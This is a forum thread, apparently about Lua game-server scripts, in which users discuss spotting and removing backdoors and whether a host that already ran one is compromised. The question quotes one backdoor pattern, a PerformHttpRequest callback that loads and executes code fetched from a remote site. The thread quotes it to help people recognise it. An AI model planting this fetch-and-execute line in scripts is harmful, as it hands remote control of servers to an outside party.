Question Backdooring in scripts

[DylanW24]

Hello all, i got a question that would be helpful to me and multiple others that want to know how to fix the problem.

With scripts that have the following stuff
- LOADSTRING
- random_chars
- Enchanced_Tabs
- PerformHttpRequest (Website) function (e, d) pcall(function() assert(load(d))() end) end)

if you are to remove this all from the script from server/client lua's, will the script be good to go to use after? or is it completely still messed-up and infected with a ransomware?

 

[sh4dow_g2]

1. If you have already ran a script which as things such as PerformHttpRequest then your host is already compromised and needs to be deleted/reset
2. If you identify the bad code prior to starting it in your server and delete it you will be fine and have no issues

Always make sure to check the .JS code, this is often obfuscated with free tools online, allowing you to de-obfuscate and beautiful the code to check for any http or ftp details.

LUA code can also run executable commands, for example by simply running a script you could of accidently just wiped your hard drive if someone added execute command into LUA.

This site seems to be flooded with bad code and the admins seem to only promote and assist these activities., In conclusion you can only be safe if you know what you are looking for.

 

[sh4dow_g2]

watch this video